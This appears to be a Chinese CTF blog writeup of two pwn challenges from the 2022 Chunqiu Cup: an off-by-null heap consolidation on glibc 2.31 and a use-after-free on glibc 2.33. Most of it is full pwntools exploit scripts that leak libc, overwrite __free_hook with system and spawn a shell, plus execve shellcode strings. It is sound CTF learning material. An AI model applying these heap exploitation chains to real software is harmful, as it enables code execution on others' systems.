---
title: 2022 春秋杯春季赛 部分pwn Writeup
date: 2022-05-12 18:52:32 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=22/
pin: false
published:
---

## torghast(2.31/offbynull堆合并)

保护全开

做的勇者山峰赛道，下午开始看的题，做了一道题pwn方向第8

题目是一个魔兽的游戏？逆向后发现，要想进入正常的堆题环境，需要拿到游戏通关

通关主要是看是否有backdoor

![image-20220509113917997](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220509113917997.png)

在magic功能里有一个魔法，如果你有无线蓝条就能拿到backdoor。而mp数组是个int类型，减到负数就无限蓝了

![image-20220509114003142](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220509114003142.png)

通关以后就是一个2.31下的offbynull，具体看exp

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux', log_level='debug')

p = process('./pwn')
elf = ELF("./pwn")
libc = elf.libc
# libc = ELF("./libc-2.23.so")
# p = remote("123.56.165.31",16678)
def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def add(idx,size,con):
	sla("Select Your Choice:",1)
	sla("Select User Id\n",idx)
	sla("Player Data Size",size)
	p.sendafter("Input Data",con)

def edit(idx,con):
	sla("Select Your Choice:",2)
	sla("Which Player To Change?",idx)
	p.sendafter("Your Log:",con)

def show(idx):
	sla("Select Your Choice:",4)
	sla("Select Your Choice:",2)
	sla('Choose Which User?',idx)
	sla("Select Your Choice:",1)
	sla("4. Return to Main Menu\n",3)
	p.recvuntil("Here Is The Adventure Log:")
	s = uu64()# u64(p.recv(6)+'\x00'*2)
	sla("4. Return to Main Menu\n",4)
	sla("Select Your Choice:",3)
	return s

def delete(idx):
	sla("Select Your Choice:",3)
	sla("Which Player You Want To Delete:",idx)

def magic(choice):
	sla("4. Return to Main Menu\n",2)
	sla("4. Gain Infinity HP (Only GM)\n",choice)

def challange():
	sla("4. Return to Main Menu\n",1)

sla("Select Your Choice:",1)
magic(1)
magic(2)
magic(3)
magic(3)
magic(3)
magic(4)
for i in range(3):
	magic(1)
challange()
challange()
challange()
sla("4. Return to Main Menu\n",4)
sla("Select Your Choice:",3)

# 这里size最大最好别超过0x440，不然放进largebin时/不在同一个区间上
add(1,0x418,'e4l4') # 1 
add(2,0x128,'e4l4') # 2 # 最后绕过tcache个数检测，和最后利用堆复用的chunk一样大
add(3,0x418,'e4l4') # 3
add(4,0x438,'e4l4') # 4 
add(5,0x148,'e4l4') # 5
add(6,0x428,'e4l4') # 6 
add(7,0x138,'e4l4') # 7

# fakechunk 粘fd和bk
delete(1)
delete(4)
delete(6)

#设置fakechunk size位
delete(3) 
add(1,0x438,'\xe0')  # 1 
edit(1,'a' * 0x418 + p64(0xb01)[:7])
add(3,0x418,'\xe0')  # 3 
edit(3,'\xe0')
add(4,0x428,'\xd0')  # 4 
edit(4,'\xd0')
add(6,0x418,'\xd0')  # 6 
edit(6,'\xd0')

# 设置bk
delete(6)
delete(3)
add(3,0x418,'\xd0')  # 3
edit(3,p64(0)+'\x40')
add(6,0x418,'\xe0')  # 6
edit(6,'\xe0')

# 设置fd
delete(6)
delete(4)
add(4,0x5f8,'a')# 4 # 置入largebin
add(6,0x428,'\x60')# 6
edit(6,'\x40')
add(8,0x418,'\xd0')# 8
edit(8,'\xd0')
add(9,0xf8,'a')# 9
edit(7,'a'*0x130+p64(0xb00))

delete(4)# 触发合并

add(4,0x10,'a')# 4
# 0x7f19374d8be0  0x7f19372ec000
libc_base = show(8)-0x1ECBE0
lg('libc_base',libc_base)

sys = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

add(10,0x128,'a')#10
delete(2)
delete(10)
edit(8,p64(free_hook))
add(2,0x128,'a')# 1
add(10,0x128,'a')# 9
edit(2,"/bin/sh\x00")
edit(10,p64(sys))
delete(2)

p.interactive()
```

## chunzhiIot(VMpwn/2.33UAF)

![image-20220523135229217](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220523135229217.png)

![image-20220523135247225](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220523135247225.png)

![image-20220523135306382](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220523135306382.png)

逆向后漏洞点在UAF同时功能齐全，可开大堆。难点在逆向上

```c
# strtok()
# 声明
char *strtok(char *str, const char *delim)
# 参数
str -- 要被分解成一组小字符串的字符串。
delim -- 包含分隔符的 C 字符串。
# 返回值
/* 获取第一个子字符串 */
token = strtok(str, s);
/* 继续获取其他的子字符串 */
while( token != NULL ) {
   printf( "%s\n", token );
    
   token = strtok(NULL, s);
}

# strstr()
# 声明
char *strstr(const char *haystack, const char *needle)
# 参数
haystack -- 要被检索的 C 字符串。
needle -- 在 haystack 字符串内要搜索的小字符串。
# 返回值
该函数返回在 haystack 中第一次出现 needle 字符串的位置，如果未找到则返回 null。
    
# strchr()
# 声明
char *strchr(const char *str, int c)
# 参数
str -- 要被检索的 C 字符串。
c -- 在 str 中要搜索的字符。
# 返回值
该函数返回在字符串 str 中第一次出现字符 c 的位置，如果未找到该字符则返回 NULL。
```

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'

p = process('./iot')
elf = ELF("./iot")
libc = elf.libc
def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def send(package):
	sa("Waiting Package...",package)
def login():
	send("DEV / HTTP/1.1 \r\nrotartsinimda")
def add(index,size,context):
	send("POST / HTTP/1.1 \r\n\x01"+"&"+str(index)+"&"+str(size)+"&"+context)
def edit(index,context):
	send("POST / HTTP/1.1 \r\n\x02"+"&"+str(index)+"&"+context)
def show(index):
	send("POST / HTTP/1.1 \r\n\x03"+"&"+str(index))
def free(index):
	send("POST / HTTP/1.1 \r\n\x04"+"&"+str(index))

login()

add(0,0x450,'a'*8)
add(1,0x90,'a')
add(2,0x90,'a')
add(3,0x90,'a')
add(4,0x20,'a')

free(0)
edit(0,'a')
show(0)
ru("Content-Length: 6\n")
libc_base=u64(p.recv(6).ljust(8,'\x00'))-(0x7f042ffd4c61-0x7f042fdf4000)
lg("libc_base")
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
free(3)
free(2)
free(1)
free(4)
show(4)
ru("Content-Length: 5\n")
key=u64(p.recv(5).ljust(8,'\x00'))
heap_base=key<<12
lg("heap_base")
edit(1,p64(free_hook^key))

add(5,0x90,'a')
add(6,0x90,p64(system))
edit(4,'/bin/sh\x00')
free(4)

p.interactive()
```

